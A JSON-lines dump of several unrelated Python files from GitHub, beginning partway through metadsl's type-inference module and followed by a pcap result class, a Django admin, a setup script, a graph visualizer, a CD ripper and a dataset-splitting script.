as default argument\n if not issubclass(t, hint) and not isinstance(..., t):\n logger.debug(\"not subclass\")\n raise TypeError(f\"Cannot match concrete type {t} with hint {hint}\")\n return merge_typevars(\n *(\n match_types(inner_hint, inner_t)\n for inner_hint, inner_t in zip(get_inner_types(hint), get_inner_types(t))\n )\n )\n\n\ndef get_origin_type(t: typing.Type) -> typing.Type:\n \"\"\"\n Takes in a type, and if it is a generic type, returns the original type hint.\n\n typing.List[int] -> typing.List[T]\n \"\"\"\n t = get_origin(t) or t\n\n params = typing_inspect.get_parameters(t)\n if params:\n return t[params]\n return t\n\n\nT_type = typing.TypeVar(\"T_type\", bound=typing.Type)\n\n\ndef replace_typevars(typevars: TypeVarMapping, hint: T_type) -> T_type:\n \"\"\"\n Replaces type vars in a type hint with other types.\n \"\"\"\n if typing_inspect.is_typevar(hint):\n return typing.cast(\n T_type, typevars.get(typing.cast(typing.TypeVar, hint), hint)\n )\n\n # Special case empty callable, which raisees error on getting args\n if hint == typing.Callable: # type: ignore\n return hint\n if typing_inspect.get_origin(hint) == collections.abc.Callable:\n arg_types, return_type = typing_inspect.get_args(hint)\n return typing.cast(\n T_type,\n typing.Callable[\n [replace_typevars(typevars, a) for a in arg_types],\n replace_typevars(typevars, return_type),\n ],\n )\n\n args = typing_inspect.get_args(hint)\n if not args:\n return hint\n replaced_args = tuple(replace_typevars(typevars, arg) for arg in args)\n return get_origin(hint)[replaced_args]\n\n\n@functools.lru_cache()\ndef inspect_signature(fn: typing.Callable) -> inspect.Signature:\n return inspect.signature(fn)\n\n\n@functools.lru_cache()\ndef typing_get_type_hints(fn: typing.Callable) -> typing.Dict[str, typing.Type]:\n return typing.get_type_hints(fn)\n\n\ndef get_arg_hints(fn: typing.Callable) -> typing.List[typing.Type]:\n signature = inspect_signature(fn)\n hints = typing_get_type_hints(fn)\n return [hints[param] for param in signature.parameters.keys()]\n\n\ndef infer_return_type(\n fn: typing.Callable[..., T],\n owner: typing.Optional[typing.Type],\n is_classmethod: bool,\n args: typing.Tuple[object, ...],\n kwargs: typing.Mapping[str, object],\n) -> typing.Tuple[\n typing.Tuple[object, ...],\n typing.Mapping[str, object],\n typing.Type[T],\n TypeVarMapping,\n]:\n logger.debug(\n \"infer_return_type fn=%s owner=%s args=%s kwargs=%s\", fn, owner, args, kwargs\n )\n hints = copy.copy(typing_get_type_hints(fn))\n signature = inspect_signature(fn)\n\n mappings: typing.List[TypeVarMapping] = []\n # This case is triggered if we got here from a __get__ call\n # in a descriptor\n if owner:\n first_arg_name = next(iter(signature.parameters.keys()))\n first_arg_type: typing.Type\n owner_origin = get_origin_type(owner)\n if is_classmethod:\n # If we called this as a class method, add the owner to\n # the args add the inferred type to the hints.\n args = (owner,) + args # type: ignore\n first_arg_type = typing.Type[owner_origin] # type: ignore\n else:\n # If the owner had type parameters set, we should use those to start computing variables\n # i.e. 
Class[int].__add__\n mappings.append(match_types(owner_origin, owner))\n first_arg_type = owner_origin # type: ignore\n\n if first_arg_name not in hints:\n hints[first_arg_name] = first_arg_type # type: ignore\n\n bound = signature.bind(*args, **kwargs)\n bound.apply_defaults()\n\n # We need to edit the arguments to pop off the variable one\n arguments = copy.copy(bound.arguments)\n\n for arg_name, p in signature.parameters.items():\n if p.kind == inspect.Parameter.VAR_POSITIONAL:\n variable_args = arguments.pop(arg_name)\n argument_items = list(arguments.items())\n argument_items += [(arg_name, a) for a in variable_args]\n break\n else:\n argument_items = list(arguments.items())\n\n return_hint: typing.Type[T] = hints.pop(\"return\", typing.Any) # type: ignore\n\n mappings += [\n match_type(hints.get(name, typing.Any), arg) # type: ignore\n for name, arg in argument_items\n ]\n try:\n matches: TypeVarMapping = merge_typevars(*mappings)\n except ValueError:\n raise TypeError(f\"Couldn't merge mappings {mappings}\")\n final_args = bound.args[1:] if is_classmethod else bound.args\n final_kwargs = bound.kwargs\n logger.debug(\n \"infer_return_type matches=%s args=%s kwargs=%s\", matches, args, kwargs\n )\n for arg in final_args:\n record_scoped_typevars(arg, *matches.keys())\n for kwarg in final_kwargs.values():\n record_scoped_typevars(kwarg, *matches.keys())\n return (final_args, final_kwargs, replace_typevars(matches, return_hint), matches)\n\n\ndef record_scoped_typevars(f: object, *additional_typevars: typing.TypeVar) -> None: # type: ignore\n if not isinstance(f, types.FunctionType):\n return\n f.__scoped_typevars__ = frozenset( # type: ignore\n {\n *get_all_typevars(get_function_type(f)),\n *get_typevars_in_scope(),\n *additional_typevars,\n }\n )\n\n\nWrapperType = typing.Callable[\n [\n typing.Callable[..., T],\n typing.Tuple[object, ...],\n typing.Mapping[str, object],\n typing.Type[T],\n ],\n U,\n]\n\n\n_TYPEVARS_IN_SCOPE: typing.Counter[ # type: ignore\n typing.TypeVar\n] = collections.Counter()\n\n\ndef get_typevars_in_scope() -> typing.Set[typing.TypeVar]: # type: ignore\n return set(k for k, v in _TYPEVARS_IN_SCOPE.items() if v > 0)\n\n\n@dataclasses.dataclass\nclass TypeVarScope:\n typevars_in_scope: typing.Tuple[typing.TypeVar, ...] 
# type: ignore\n\n def __init__(self, *tvs: typing.TypeVar) -> None: # type: ignore\n self.typevars_in_scope = tvs\n\n def __enter__(self) -> None:\n _TYPEVARS_IN_SCOPE.update(self.typevars_in_scope)\n\n def __exit__(self, *exc_details) -> None:\n _TYPEVARS_IN_SCOPE.subtract(self.typevars_in_scope)\n\n\n@dataclasses.dataclass\nclass NewTypeVarScope:\n previous_typvars_in_scope: typing.Optional[ # type: ignore\n typing.Counter[typing.TypeVar]\n ] = None\n\n def __enter__(self) -> None:\n assert not self.previous_typvars_in_scope\n self.previous_typvars_in_scope = collections.Counter(_TYPEVARS_IN_SCOPE)\n _TYPEVARS_IN_SCOPE.clear()\n\n def __exit__(self, *exc_details) -> None:\n assert self.previous_typvars_in_scope\n _TYPEVARS_IN_SCOPE.update(self.previous_typvars_in_scope)\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass Infer(typing.Generic[T, U]):\n fn: typing.Callable[..., T]\n wrapper: WrapperType[T, U] = dataclasses.field(repr=False)\n\n def __post_init__(self):\n functools.update_wrapper(self, self.fn)\n\n def __call__(self, *args, **kwargs) -> U:\n *wrapper_args, typevars = infer_return_type(self.fn, None, False, args, kwargs)\n with TypeVarScope(*typevars.keys()):\n res = self.wrapper(self, *wrapper_args) # type: ignore\n return res\n\n def __get__(self, instance, owner) -> BoundInfer[T, U]:\n is_classmethod = isinstance(self.fn, classmethod)\n is_property = isinstance(self.fn, property)\n if is_classmethod and is_property:\n raise NotImplementedError(\"classmethod properties are not supported\")\n fn = self.fn\n if is_classmethod:\n fn = fn.__func__ # type: ignore\n if is_property:\n fn = fn.fget # type: ignore\n if instance:\n method = BoundInfer( # type: ignore\n fn, self.wrapper, get_type(instance), is_classmethod # type: ignore\n )\n # if this is not a classmethod we are calling on an instance, bind the first value to self\n if not is_classmethod:\n method = functools.partial(method, instance) # type: ignore\n if is_property:\n return method() # type: ignore\n return method # type: ignore\n return BoundInfer( # type: ignore\n fn, self.wrapper, owner, is_classmethod # type: ignore\n )\n\n def __repr__(self):\n return getattr(self.fn, \"__name__\", str(self.fn))\n\n\nSPECIAL_BINARY_METHODS = {\n f\"__{n}__\"\n for n in [\n # comparison\n \"lt\",\n \"le\",\n \"eq\",\n \"ne\",\n \"gt\",\n \"ge\",\n # numeric\n \"add\",\n \"sub\",\n \"mul\",\n \"matmul\",\n \"truediv\",\n \"mod\",\n \"divmod\",\n \"pow\",\n \"lshift\",\n \"rshift\",\n \"and\",\n \"xor\",\n \"or\",\n ]\n}\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass BoundInfer(typing.Generic[T, U]):\n fn: typing.Callable[..., T]\n wrapper: WrapperType[T, U] = dataclasses.field(repr=False)\n owner: typing.Type\n is_classmethod: bool\n\n def __post_init__(self):\n functools.update_wrapper(self, self.fn)\n\n def __call__(self, *args, **kwargs) -> U:\n try:\n *wrapper_args, typevars = infer_return_type(\n self.fn, self.owner, self.is_classmethod, args, kwargs\n )\n except TypeError:\n # Return NotImplemented from special methods\n # if it cannot handle the types, instead of throwing\n # https://docs.python.org/3/library/constants.html#NotImplemented\n if self.fn.__name__ in SPECIAL_BINARY_METHODS:\n return NotImplemented\n raise\n with TypeVarScope(*typevars.keys()):\n res = self.wrapper(self, *wrapper_args) # type: ignore\n return res\n\n def __repr__(self):\n return f\"{type_repr(self.owner)}.{self.fn.__name__}\"\n\n\ndef type_repr(tp: type) -> str:\n \"\"\"\n Returns the repr for the type, preserving any generic 
params.\n\n    Unlike the builtin generic type repr, it does not include the module.\n    \"\"\"\n    if isinstance(tp, (typing.TypeVar, typing._SpecialForm)):\n        return repr(tp)\n    tp_name = tp.__qualname__\n    args = getattr(tp, \"__args__\", [])\n    if args:\n        return f\"{tp_name}[{', '.join(map(type_repr, args))}]\"\n    return tp_name\n\n\ndef infer(\n    fn: typing.Callable[..., T], wrapper: WrapperType[T, U]\n) -> typing.Callable[..., U]:\n    \"\"\"\n    Wraps a function to return the args, kwargs, and the inferred return type based\n    on the arguments.\n\n    This raises a TypeError when called with types that are invalid.\n\n    It relies on the explicit generic types of the arguments; it does not traverse\n    them to check their types. That means if you pass in `[1, 2, 3]` it won't know\n    this is a `typing.List[int]`. Instead, it will only know if you create a generic\n    instance manually from a custom generic class like `MyList[int](1, 2, 3)`.\n    \"\"\"\n\n    return Infer(fn, wrapper)\n\n\ndef match_functions(\n    fn_with_typevars: typing.Callable, fn: typing.Callable\n) -> TypeVarMapping:\n    if not isinstance(fn_with_typevars, BoundInfer) or not isinstance(fn, BoundInfer):\n        if fn_with_typevars == fn:\n            return {}\n        raise TypeError(f\"{fn_with_typevars} != {fn}\")\n    if fn_with_typevars.fn == fn.fn:\n        return match_types(fn_with_typevars.owner, fn.owner)\n    raise TypeError(f\"{fn_with_typevars} != {fn}\")\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass FunctionReplaceTyping:\n    fn: typing.Callable\n    typevars: HashableMapping[typing.TypeVar, typing.Type]  # type: ignore\n    typevars_in_scope: typing.FrozenSet[typing.TypeVar]  # type: ignore\n    inner_mapping: typing.Callable[[typing.Any], typing.Any] = dataclasses.field(\n        repr=False\n    )\n\n    @classmethod\n    def create(\n        cls,\n        fn: typing.Callable,\n        typevars: TypeVarMapping,\n        inner_mapping: typing.Callable[[typing.Any], typing.Any],\n    ) -> typing.Callable:\n        if isinstance(fn, FunctionReplaceTyping):\n            return fn\n        typevars_in_scope: typing.FrozenSet[TypeVar] = fn.__scoped_typevars__  # type: ignore\n        if not typevars_in_scope:\n            return fn\n        # TODO: Fix hack\n        if \"fib_more\" in str(fn):\n            return fn\n\n        typevars = HashableMapping(\n            {k: v for k, v in typevars.items() if k in typevars_in_scope}\n        )\n        res = cls(fn, typevars, typevars_in_scope, inner_mapping)\n\n        functools.update_wrapper(res, fn)\n        res.__annotations__ = {\n            k: replace_typevars(typevars, v)\n            for k, v in typing_get_type_hints(fn).items()\n        }\n\n        return res\n\n    def __call__(self, *args, **kwargs):\n        with NewTypeVarScope():\n            with TypeVarScope(*self.typevars_in_scope):\n                return self.inner_mapping(self.fn(*args, **kwargs))  # type: ignore\n\n    # def __repr__(self):\n    #     return repr(self.fn)\n\n    # def __str__(self):\n    #     return str(self.fn)\n\n\n@dataclasses.dataclass(unsafe_hash=True)\nclass Identity:\n    def __call__(self, a):\n        return a\n\n\ndef replace_fn_typevars(\n    fn: T,\n    typevars: TypeVarMapping,\n    inner_mapping: typing.Callable[[T], T] = Identity(),\n) -> T:\n    if isinstance(fn, BoundInfer):\n        return typing.cast(\n            T,\n            BoundInfer(  # type: ignore\n                fn=fn.fn,\n                wrapper=fn.wrapper,  # type: ignore\n                is_classmethod=fn.is_classmethod,\n                owner=replace_typevars(typevars, fn.owner),\n            ),\n        )\n    if isinstance(fn, types.FunctionType):\n        logger.debug(\"replace_fn_typevars function fn=%s typevars=%s\", fn, typevars)\n        # Create new function by replacing typevars in existing function\n        return FunctionReplaceTyping.create(fn, typevars, inner_mapping)  # type: ignore\n    return fn\n\n\ndef get_fn_typevars(fn: object) -> TypeVarMapping:\n    
if isinstance(fn, BoundInfer):\n        return match_types(get_origin_type(fn.owner), fn.owner)\n    return {}\n","repo_name":"metadsl/metadsl","sub_path":"metadsl/typing_tools.py","file_name":"typing_tools.py","file_ext":"py","file_size_in_byte":31452,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"67"}
+{"seq_id":"70678950293","text":"# coding: utf-8\nfrom hashlib import md5\n\n__author__ = 'vadim'\n\nclass ResultSet:\n    def __init__(self, src_ip, dst_ip, data, file_extension,file_name):\n        self.src_ip = src_ip\n        self.dst_ip = dst_ip\n        self.data = data\n        self.file_extension = file_extension\n        self.file_name = file_name\n\n    def generate_file_name(self, index=None):\n        \"\"\"\n        Generate a unique file name, using an md5 hash.\n        The hash is computed over the first 2048 bytes of data\n        :param index: appends an index to the file name after generation\n        :return: {md5-hash}_{index}.{file_extension}\n        \"\"\"\n        # Limiting the input of the md5 hash is required for large files\n        # The value of 2048 bytes was chosen arbitrarily\n        hash = md5(self.data[:2048])\n        file_name = hash.hexdigest()\n        if index is not None:\n            file_name += '_%i' % index\n        file_name += self.file_extension\n        return file_name\n","repo_name":"vadimlarionov/pcap-parser","sub_path":"parser_package/result_set.py","file_name":"result_set.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"30252236653","text":"from django.contrib import admin\nfrom django.utils.html import format_html\n\nfrom ordered_model.admin import OrderedModelAdmin\n\nfrom courses.models import CourseLecture, CourseLectureDurationTime\n\n\nclass CourseLectureDurationTimeInline(admin.TabularInline):\n    verbose_name = \"Duration time\"\n    verbose_name_plural = \"Duration time\"\n    model = CourseLectureDurationTime\n    can_delete = False\n\n\n@admin.register(CourseLecture)\nclass CourseLectureAdmin(OrderedModelAdmin):\n    list_display = [\n        \"id\",\n        \"title\",\n        'section',\n        'course',\n        'course_image_tag',\n        'order_in_course',\n        'move_up_down_links',\n    ]\n\n    list_display_links = [\n        \"id\", \n        \"title\",\n        \"section\",\n        \"course\",\n        \"course_image_tag\",\n    ]\n\n    fields = [\n        \"course_section\",\n        \"title\",\n        \"description\",\n        \"students_finished_count\",\n        \"free_opened\",\n    ]\n\n    readonly_fields = [\n        \"students_finished_count\",\n    ]\n\n    inlines = [\n        CourseLectureDurationTimeInline\n    ]\n\n    def section(self, obj):\n        return obj.course_section.title\n\n    def course_image_tag(self, obj):\n        course = obj.course_section.course_content.course\n        return format_html(f'')\n\n    def course(self, obj):\n        return obj.course_section.course_content.course.title\n\n    def order_in_course(self, obj):\n        return obj.order + 1\n","repo_name":"3asyPe/astudy","sub_path":"backend/src/courses/admin/lectures.py","file_name":"lectures.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"21995168671","text":"from setuptools import setup, find_packages\n\nsetup(\n    name='wordside',\n    version='1.1',\n    packages=find_packages(),\n    include_package_data=True,\n    author='Evgeni Pochchuev',\n    author_email='jackio@tuta.io',\n    url='https://github.com/jacki0/wordside',\n    install_requires=[\n        
'pymorphy2==0.8'\n    ],\n)\n","repo_name":"pchchv/wordside","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"74933151254","text":"from __future__ import annotations\n\nimport inspect\nimport json\nimport random\nfrom importlib import resources\nfrom importlib.metadata import distribution\n\nimport networkx as nx\n\ndiagraph_version = distribution(\"diagraph\").metadata[\"version\"]\n\n\ndef load_from_dist(url: str):\n    return load_resource(f\"./assets/dist/{url}\")\n\n\ndef load_resource(resource_filepath: str, pkg=\"diagraph\") -> str:\n    ref = resources.files(pkg).joinpath(resource_filepath)\n    with ref.open(\"r\") as f:\n        return f.read()\n\n\ndef render_repr_html(diagraph):\n    G = diagraph.__graph__.__G__\n\n    graph = {}\n    nodes = []\n    links = nx.node_link_data(G)[\"links\"]\n    if len(links) == 0:\n        for int_key in nx.topological_sort(G):\n            fn = diagraph.__graph__.get_node_for_int_key(int_key)\n            graph[fn.__name__] = []\n    else:\n        for link in links:\n            source = link.get(\"source\")\n            target = link.get(\"target\")\n            if graph.get(target) is None:\n                graph[target] = []\n            graph[target].append(source)\n    if len(graph.keys()) == 0:\n        raise Exception(\"Empty graph\")\n\n    for fn in diagraph.__graph__.get_nodes():\n        int_key = str(diagraph.__graph__.get_int_key_for_node(fn))\n        node = diagraph[fn]\n        node_definition = {\n            \"id\": int_key,\n            \"label\": fn.__name__,\n            \"fn\": inspect.getsource(fn),\n            \"prompt\": \"\",\n            \"result\": \"\",\n        }\n        if node.__is_decorated__:\n            try:\n                node_definition[\"prompt\"] = node.prompt\n            except Exception:\n                pass\n            try:\n                node_definition[\"result\"] = node.result\n            except Exception:\n                pass\n        nodes.append(node_definition)\n\n    # fn = diagraph.__graph__.get_node_for_int_key(0)\n    # graph = json.dumps(graph)\n\n    style = load_from_dist(\"style.css\")\n    script = load_from_dist(\"diagraph-visualizer.umd.cjs\")\n\n    props = json.dumps(\n        {\n            \"nodes\": nodes,\n            \"graph\": graph,\n            \"version\": diagraph_version,\n        },\n    )\n    random_number = random.randint(0, 100000000)\n    root_id = f\"root-{random_number}\"\n    style = (\n        \"#\"\n        + root_id\n        + \"\"\" {\n    width: 100%;\n    min-height: 600px;\n    display: flex;\n    align-items: stretch;\n}\n\"\"\"\n        + style\n    )\n    return f\"\"\"\n\n    \n\n    \n\n    
\n \n\n \"\"\"\n\n # \n #
\n # \n # \n #
\n","repo_name":"thekevinscott/Diagraph","sub_path":"packages/python/diagraph/visualization/render_repr_html.py","file_name":"render_repr_html.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"4103653180","text":"from __future__ import annotations\n\nimport json\nimport os\nimport os.path\nfrom datetime import datetime\nfrom os import PathLike\nfrom pathlib import Path\nfrom subprocess import Popen, PIPE, STDOUT\nfrom typing import Union, Optional, List, Dict\n\nimport pytz\n\nfrom . import cd\nfrom . import cdplayer\nfrom . import tools\nfrom .accuraterip import AccurateRip, AccurateRipConfidence\n\n\nclass AudioRipperException(Exception):\n    pass\n\n\n# this class handles the actual ripping from cd to audio file\n# all intermediate files are stored as raw 16-bit signed samples (at 44.1kHz)\nclass AudioRipper:\n    COMMANDS = {\n        'cdrdao': Path('/usr/bin/cdrdao'),\n        'icedax': Path('/usr/bin/icedax'),\n        'cdparanoia': Path('/usr/bin/cdparanoia'),\n        'sox': Path('/usr/bin/sox'),\n        'flac': Path('/usr/bin/flac')\n    }\n    sox_raw_spec = ['-t', 'raw', '--endian', 'little', '-b16', '-esigned', '-c2', '-r44100']\n    sox_wav_spec = ['-t', 'wav', '--endian', 'little', '-b16', '-esigned', '-c2', '-r44100']\n\n    def __init__(self, disc : cd.Disc, destdir: PathLike) -> None:\n        self.disc: cd.Disc = disc\n        self.cdplayer: cdplayer.CDPlayer = disc.cdplayer\n        self.destdir: Path = Path(destdir)\n        self.wav_file: Optional[Path] = None\n        self.flac_file: Optional[Path] = None\n        self.rip_date: datetime = datetime.now(pytz.timezone(\"Europe/Amsterdam\")).replace(microsecond=0)\n        self.accuraterip_results: Optional[Dict[cd.TrackNr, AccurateRipConfidence]] = None\n\n        self.destdir.mkdir(parents=True, exist_ok=True)\n\n    def as_json(self) -> str:\n        return json.dumps(self.__dict__, indent=4, cls=tools.AudioRipperJSONEncoder)\n\n    @property\n    def cd(self) -> cdplayer.CDPlayer:\n        return self.cdplayer\n\n    @property\n    def cwd(self) -> Path:\n        return self.destdir\n\n    def path(self, name: Union[PathLike, str]) -> Path:\n        return Path(self.destdir, name)\n\n    def rip(self) -> None:\n        self.wav_file = self.rip_icedax()\n        accuraterip = AccurateRip(self.disc, self.wav_file)\n        confidence = accuraterip.find_confidence()\n        if confidence is not None:\n            for track, conf in [(t, c) for t, c in confidence.items() if c < 10]:\n                print(accuraterip.ar_results)\n                print(f\"Track {track} failed (confidence is {conf}), retrying\")\n                raise AudioRipperException(\"Reripping tracks is not implemented yet\")\n        self.accuraterip_results = confidence\n        self.flac_file = self.convert_to_flac()\n\n        return\n\n    def save(self, dest: Path, basename: Path) -> None:\n        if not dest.is_dir():\n            raise AudioRipperException(f\"Destination '{dest}' for save is not a directory\")\n        if list(dest.glob(str(basename)+\"*\")):\n            raise AudioRipperException(f\"Destination id '{dest / basename}' already exists\")\n\n        name = dest / basename\n        self.wav_file.rename(name.with_suffix(\".flac\"))\n        with open(name.with_suffix(\".json\"), \"x\") as fp:\n            fp.write(self.as_json())\n\n    def exec(self, command: str, args: List[str], cwd: Optional[PathLike] = None):\n        if cwd is None:\n            cwd = self.cwd\n        cmd = self.COMMANDS[command]\n        process = tools.execcmd(cmd=cmd, args=args, cwd=cwd, show_output=True)\n        if process.returncode != 0:\n            print(f\"Woops, command '{cmd}' failed:\")\n            print(process.stderr)\n            process.check_returncode()\n        print(process.stdout)\n        print(process.stderr)\n\n    def rip_icedax(self) -> 
PathLike:\n output_file = self.path('icedax.wav')\n\n if output_file.exists():\n print(\"Rip exists, skipping\")\n return output_file\n\n args = [\n self.COMMANDS['icedax'],\n '-D', self.cd.device_name,\n '--max', '--no-infofile',\n '--output-format', 'wav',\n '--track', f\"{self.cd.firsttrack}+{self.cd.lasttrack}\",\n output_file\n ]\n\n print(\"Ripping disc using icedax:\")\n\n popen = Popen(args, cwd=self.cwd,\n stdout=PIPE, stderr=STDOUT, encoding='ascii', text=True, bufsize=0)\n\n # produce some fancy output\n current_track = 0\n while popen.poll() is None:\n line = popen.stdout.readline().rstrip()\n\n if current_track > 0:\n if \"%\" in line:\n print(f\"\\rTrack {current_track:-2d}/{self.cd.lasttrack}: {line}\", end=\"\")\n if \"recorded successfully\" in line:\n print()\n\n if line == 'percent_done:' or line.endswith(\"recorded successfully\"):\n current_track += 1\n\n if popen.returncode != 0:\n print(\"Error while ripping, cleaning up\")\n output_file.unlink(missing_ok=True)\n\n return output_file\n\n def convert_to_flac(self) -> PathLike:\n input_file = self.wav_file\n output_file = self.path(\"icedax.flac\")\n\n output_file.unlink(missing_ok=True)\n if output_file.exists():\n print(\"Flac exists, skipping\")\n return output_file\n\n args = [\n self.COMMANDS['flac'],\n \"--no-keep-foreign-metadata\",\n \"-6\",\n \"--output-name=\" + str(output_file),\n input_file\n ]\n\n print(\"Converting sound to flac\")\n\n popen = Popen(args, cwd=self.cwd,\n stdout=PIPE, stderr=STDOUT, encoding='ascii', text=True, bufsize=0)\n\n # produce some fancy output\n # flac produces annoying output, including a non-removable preamble.\n # and a progress indicator that overwrites itself by backspacing over the old text\n # like this:\n # ╰─▶ flac -6 --output-name=icedax.flac -f cdrdao.wav|& xxd\n # 00000000: 0a66 6c61 6320 312e 342e 320a 436f 7079 .flac 1.4.2.Copy\n # 00000010: 7269 6768 7420 2843 2920 3230 3030 2d32 right (C) 2000-2\n # 00000020: 3030 3920 204a 6f73 6820 436f 616c 736f 009 Josh Coalso\n # 00000030: 6e2c 2032 3031 312d 3230 3232 2020 5869 n, 2011-2022 Xi\n # 00000040: 7068 2e4f 7267 2046 6f75 6e64 6174 696f ph.Org Foundatio\n # 00000050: 6e0a 666c 6163 2063 6f6d 6573 2077 6974 n.flac comes wit\n # 00000060: 6820 4142 534f 4c55 5445 4c59 204e 4f20 h ABSOLUTELY NO\n # 00000070: 5741 5252 414e 5459 2e20 2054 6869 7320 WARRANTY. This\n # 00000080: 6973 2066 7265 6520 736f 6674 7761 7265 is free software\n # 00000090: 2c20 616e 6420 796f 7520 6172 650a 7765 , and you are.we\n # 000000a0: 6c63 6f6d 6520 746f 2072 6564 6973 7472 lcome to redistr\n # 000000b0: 6962 7574 6520 6974 2075 6e64 6572 2063 ibute it under c\n # 000000c0: 6572 7461 696e 2063 6f6e 6469 7469 6f6e ertain condition\n # 000000d0: 732e 2020 5479 7065 2060 666c 6163 2720 s. 
Type `flac'\n # 000000e0: 666f 7220 6465 7461 696c 732e 0a0a 6364 for details...cd\n # 000000f0: 7264 616f 2e77 6176 3a20 3125 2063 6f6d rdao.wav: 1% com\n # 00000100: 706c 6574 652c 2072 6174 696f 3d31 2e30 plete, ratio=1.0\n # 00000110: 3033 0808 0808 0808 0808 0808 0808 0808 03..............\n # 00000120: 0808 0808 0808 0808 0808 3225 2063 6f6d ..........2% com\n # 00000130: 706c 6574 652c 2072 6174 696f 3d31 2e30 plete, ratio=1.0\n #\n # parse this, so we only output \"\\r34% complete\"\n buf = \"\"\n output_enable = False\n while popen.poll() is None:\n # make sure to read less than 1 line per iteration here.\n buf += popen.stdout.read(32)\n\n # remove preamble\n if buf.find(\": \") > 0:\n _, _, buf = buf.partition(\": \")\n output_enable = True\n\n if output_enable:\n # make sure we don't end with backspace, because then the partition won't work\n if buf.rfind(\"\\b\") != len(buf):\n line, _, buf = buf.rpartition(\"\\b\")\n # note that line cannot be multple lines because we read less than a full line per iteration\n if line:\n line = line.strip(\" \\b\")\n print(f\"\\r{line}\", end=\"\", flush=True)\n\n print()\n\n if popen.returncode != 0:\n # if result.returncode != 0:\n print(\"Error while ripping, cleaning up\")\n output_file.unlink(missing_ok=True)\n\n return output_file\n\n def rip_accurate_track(self, track: int) -> PathLike:\n # cdparanoia\n outputfile = Path(f'cdparanoia_{track:02d}.wav')\n self.exec('cdparanoia', [\n '--output-wav', '--force-cdrom-device', self.cd.device_name,\n '--sample-offset', f'{self.cd.offset:d}', f'{track:d}',\n outputfile\n ])\n return outputfile\n\n def convert_to_wav(self) -> PathLike:\n filename = 'cdrdao.wav'\n if os.path.exists(self.path(filename)):\n print(\"Wav exists, skipping\")\n else:\n self.exec('sox',\n self.sox_raw_spec + ['cdrdao.raw'] +\n self.sox_wav_spec + [filename]\n )\n self.wav_file = self.path(filename)\n return self.wav_file\n\n def correct_offset(self):\n # examples:\n # add 294 samples at the start: sox new.wav padded1.wav trim 0 -294s pad 294s 0\n # add 294 samples at the end: sox new.wav padded2.wav trim 294s pad 0 294s\n\n # Positive correction means: drive reads samples too soon, so samples need to be shifted\n # forwards in time\n correction = self.cd.offset\n if correction > 0:\n trim_spec = ['trim', '0', f'-{correction}s', 'pad', f'{correction}s', '0']\n elif correction < 0:\n trim_spec = ['trim', f'{abs(correction)}s', 'pad', '0', f'{correction}s']\n else:\n trim_spec = []\n\n self.exec('sox',\n self.sox_raw_spec + ['cdrdao.raw'] +\n self.sox_raw_spec + ['cdrdao_shifted.raw'] +\n trim_spec\n )\n","repo_name":"baszoetekouw/cdrip","sub_path":"src/voidrip/audioripper.py","file_name":"audioripper.py","file_ext":"py","file_size_in_byte":10106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24212702521","text":"\nfrom sklearn.model_selection import train_test_split\nimport torch\nimport torchtext\nfrom torchtext import data\nimport torch.optim as optim\nimport argparse\nimport os\nimport pandas as pd\n\nglove = torchtext.vocab.GloVe(name=\"6B\",dim=100)\n\ndata_path = \"data\"\nsplit = 'data'\ndf = pd.read_csv(os.path.join(data_path, f\"{split}.tsv\"), sep=\"\\t\")\n\ny = df.label\nX = df.text\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2,stratify=y)\nX_train, X_val, y_train, y_val = train_test_split(X_train, y_train,test_size=0.2,stratify=y_train)\n\nprint('Training 
Set')\nprint(y_train.value_counts())\nprint('\\n')\nprint('Validation Set')\nprint(y_val.value_counts())\nprint('\\n')\nprint('Test Set')\nprint(y_test.value_counts())\nprint('\\n')\n\ntrain_df =pd.concat([X_train,y_train],axis=1)\nval_df =pd.concat([X_val,y_val],axis=1)\ntest_df =pd.concat([X_test,y_test],axis=1)\n\nlab_df = train_df[train_df['label'] == 0]\nlab1_df = train_df[train_df['label'] == 1]\nlab_c = lab_df.iloc[0:25]\nlab1_c = lab1_df.iloc[0:25]\noverfit_df = pd.concat([lab_c,lab1_c])\noverfit_df.head()\n\ndf1 =pd.merge(X_train,X_test,how='outer')\ndf1 =pd.merge(df1,X_val,how = 'outer')\nprint('The total number of unique entries:', X.nunique())\nprint('The number of unique values in all three splits: ',df1['text'].nunique())\n\ntrain_df.to_csv(\"data/train.tsv\", sep=\"\\t\", index=False)\nval_df.to_csv(\"data/validation.tsv\", sep=\"\\t\", index=False)\ntest_df.to_csv(\"data/test.tsv\", sep=\"\\t\", index=False)\noverfit_df.to_csv(\"data/overfit.tsv\", sep=\"\\t\", index=False)\n\n\n","repo_name":"gopi-196/Natural-Language-Processing","sub_path":"Subjective\\Objective Sentence Classification Using MLP and CNN/Data Processing/A2P3_2.py","file_name":"A2P3_2.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
